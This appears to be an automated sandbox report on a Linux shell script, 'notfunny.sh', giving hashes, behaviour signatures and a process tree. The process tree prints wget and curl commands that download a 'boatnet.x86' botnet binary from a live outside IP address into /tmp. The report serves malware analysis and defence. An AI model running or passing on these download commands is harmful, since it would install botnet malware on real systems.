Analysis
-
max time kernel
149s -
max time network
127s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 01:18
Static task
static1
Behavioral task
behavioral1
Sample
notfunny.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
notfunny.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
notfunny.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
notfunny.sh
-
Size
3KB
-
MD5
fc73d6be8e91e575c902e5d3b1834868
-
SHA1
61880a4da8b19dc7d4d87b5a3d55e0a992aac856
-
SHA256
9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
-
SHA512
1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-2.dat upx -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl
Processes
-
/tmp/notfunny.sh/tmp/notfunny.sh1⤵PID:647
-
/usr/bin/wgetwget http://154.216.19.166:3000/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:651
-
-
/usr/bin/curlcurl -O http://154.216.19.166:3000/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD58833728bd41c20fb14e6075a9cdd8afc
SHA19733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA51258fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48
-
Filesize
28KB
MD512776fc203b937b6422e57bbbbcbf012
SHA1d656e47cc7c9df12f563f9e10c35594dadb3e682
SHA256a037afc2c98a4db8eecd784faacbfdc713c42ae1e8a6c804a6cc2ed7244b3623
SHA51293a943182e6da55369f6a2fbeca918469eb726609584ca128d845d0d772efb34ed53069df7715bac1250f2dfa1cfdeb6f246edfcec7825414ca9d61d86e8ae34